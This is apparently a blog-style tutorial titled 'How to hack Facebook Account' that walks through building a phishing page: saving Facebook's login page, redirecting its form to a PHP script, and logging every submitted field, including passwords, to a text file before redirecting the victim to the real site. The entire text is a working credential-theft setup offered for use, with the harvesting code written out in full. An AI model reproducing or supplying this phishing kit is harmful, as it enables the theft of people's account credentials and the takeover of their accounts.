Simple Phishing Technique/How to hack Facebook Account
Phishing is a technique in which hacker
fools the victim by fake web page and steal his information. It is very easy to
set up phishing on same computer. Using this you can Following are the steps.
Step 1: Install Wamp Server
Step 2: Open “facebook.com”. Save facebook login page.
Step 3: Open facebook saved html file in
notepad or notepad++. Search for html tag “form” and change it’s attribute
action with “login.php”. i.e. <form -----------action=”login.php”---->
Step 4: Create new file “login.php” and
write following code in that file.
<?php
header("Location:
http://www.facebook.com");
$handle =
fopen("thepasses.txt", "a");
foreach($_POST as
$variable => $value) {
fwrite($handle,
$variable);
fwrite($handle,
"=");
fwrite($handle,
$value);
fwrite($handle, "
");
}
fwrite($handle,
" ");
fclose($handle);
exit;
?>
Step
5: now copy “login.php”, “facebook.html” and folder “facebook” to wamp server’s “www” folder.
Step
6: Start wamp server’s localhost page and open facebook.html page.
Step
7: Bookmark that page.and next time open wamp server and open that bookmarked
page.